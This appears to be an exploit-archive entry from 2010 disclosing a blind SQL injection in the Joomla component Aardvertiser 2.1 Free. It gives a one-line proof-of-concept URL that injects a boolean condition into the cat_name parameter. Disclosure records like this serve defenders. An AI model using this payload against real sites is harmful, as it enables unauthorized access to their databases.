Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability
# Published : 2010-09-06
# Author : Stephan Sattler
# Previous Title : Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability
# Next Title : Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection

# Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // www.solidmedia.de
# Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
# Version: 2.1 free


[ Vulnerability//PoC ]

http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view